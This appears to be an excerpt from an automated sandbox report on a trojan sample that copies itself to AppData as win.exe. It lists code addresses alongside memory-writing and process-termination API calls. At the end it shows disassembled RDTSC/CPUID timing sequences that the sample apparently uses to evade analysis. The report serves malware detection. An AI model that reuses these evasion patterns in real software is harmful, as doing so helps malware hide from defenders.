            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45F9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8DFF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A31F4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A49F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4DE9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0DEF D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45E0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45E4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8DC3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A45B5 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0D91 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4D83 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4985 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A7E78 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4A73 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3275
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0E4D D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3244
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4638 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A3E30 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4E36 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4A27 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A46D3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A1ED7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0EB3 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4AA0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4E99 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4694 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0E80 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4A87 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B5C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2F50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2F3E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0F2F D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B2D NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B25 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4B00 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2B01 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A47F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0FEB D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A8BBE NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4BB0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A2FA8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A0F9B D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 17_2_007A4797 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0CBA D3DKMTSetStablePowerState,NtWriteVirtualMemory,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1D2E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4A27 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4638 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3E30 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4E36 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0E4D D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3244
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B7E78 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4A73 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3275
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0E80 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4A87 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4E99 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4694 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4AA0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0EB3 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B46D3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1ED7 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2B01 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B00 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0F2F D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B2D NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B25 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2F3E NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4B5C NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2F50
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0F9B D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4797 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B2FA8
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8BBE NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4BB0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0FEB D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B47F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4C16 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0C25 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B104C D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4847 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8C44
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0C5B D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4C68 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8C6D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3063
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4899 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1094 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0CA6 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B10CB D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B44CF NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0CC1 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B30C4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8CDA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B48E3 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4CE4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B60FA NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B28FE NtWriteVirtualMemory,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0CF3 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B3114
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8D14
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4D2A NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B1120 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4520 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4948 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8D5C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B116C D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B317B
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8D7E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4570 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4D83 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4985 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0D91 D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B45B5 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8DC3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B4DE9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B0DEF D3DKMTSetStablePowerState,TerminateProcess,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B45E0 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B45E4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B45F9 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B8DFF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B31F4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 18_2_020B49F4 NtWriteVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560CBA D3DKMTSetStablePowerState,NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560C5B D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564847
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00568C44
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056104C D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056147F D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00568C6D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564C68
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564C16
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561407 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561437 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560C25 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00568CDA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560CC1 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005644CF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005610CB D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560CF3 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005628FE LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564CE4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005648E3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005614E8 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561094 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564899
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560CA6 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00568D5C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564948
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564570
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00568D7E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056116C D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00568D14
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561120 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564520
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561D2E LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056152D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564D2A
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005645D2
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00568DC3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005649F4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00568DFF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005645F9
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005645E4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560DEF D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564DE9
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560D91 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564985
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564D83
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560E4D D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00567E78
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561265 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561204 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564E36
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00563E30
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564638
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564A27
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561ED7
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005646D3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005612DC D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564A97
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564694
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564E99
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560E80 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560EB3 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564AAB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564B5C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_0056136B D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564F14
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00561313 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564B00
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00562B01
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00562F3E GetEnvironmentStringsW,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560F2F D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564B2D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005613C4 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_005647F4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560FEB D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564797
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00560F9B D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00564BB0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 22_2_00568BBE
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00560CBA D3DKMTSetStablePowerState,NtProtectVirtualMemory,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00560C5B D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564847
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00568C44
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_0056104C D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_0056147F D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00568C6D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564C68
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564C16
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00561407 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00561437 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00560C25 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00568CDA
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00560CC1 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005644CF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005610CB D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00560CF3 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005628FE LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564CE4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005648E3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005614E8 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00561094 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564899
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00560CA6 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00568D5C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564948
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564570
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00568D7E
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_0056116C D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00568D14
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00561120 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564520
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00561D2E LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_0056152D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564D2A
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005645D2
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00568DC3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005649F4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00568DFF
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005645F9
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005645E4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00560DEF D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564DE9
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00560D91 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564985
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564D83
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00560E4D D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00567E78
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00561265 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00561204 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564E36
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00563E30
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564638
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564A27
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00561ED7
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005646D3
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005612DC D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564A97
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564694
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564E99
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00560E80 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00560EB3 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564AAB
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564B5C
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_0056136B D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564F14
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00561313 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564B00
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00562B01
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00562F3E GetEnvironmentStringsW,LoadLibraryA,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00560F2F D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564B2D
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005613C4 D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_005647F4
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00560FEB D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564797
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00560F9B D3DKMTSetStablePowerState,
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00564BB0
            Source: C:\Users\user\AppData\Roaming\win.exeCode function: 24_2_00568BBE
            Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B9ACC second address: 00000000020B9AFE instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov eax, edi 0x0000000c add eax, 00003004h 0x00000011 mov dword ptr [edi+00003000h], eax 0x00000017 mov ecx, A45185BAh 0x0000001c jmp 00007F430C37BB12h 0x0000001e pushad 0x0000001f lfence 0x00000022 rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B900A second address: 00000000020B9059 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a mov byte ptr [ebx-05h], FFFFFF9Ch 0x0000000e xor byte ptr [ebx-05h], FFFFFFA9h 0x00000012 jmp 00007F430C8016E6h 0x00000014 test bh, ch 0x00000016 cmp dh, ah 0x00000018 add byte ptr [ebx-05h], FFFFFFB0h 0x0000001c xor byte ptr [ebx-05h], 0000005Dh 0x00000020 inc eax 0x00000021 mov dword ptr [ebp+000001D4h], esi 0x00000027 mov esi, ecx 0x00000029 cmp ah, ah 0x0000002b push esi 0x0000002c test ch, ah 0x0000002e mov esi, dword ptr [ebp+000001D4h] 0x00000034 cmp dl, al 0x00000036 test dh, bh 0x00000038 xor ecx, ecx 0x0000003a pushad 0x0000003b rdtsc
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B9059 second address: 00000000020B9059 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B9138 second address: 00000000020B9138 instructions:
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeRDTSC instruction interceptor: First address: 00000000020B5970 second address: 00000000020B5970 instructions:
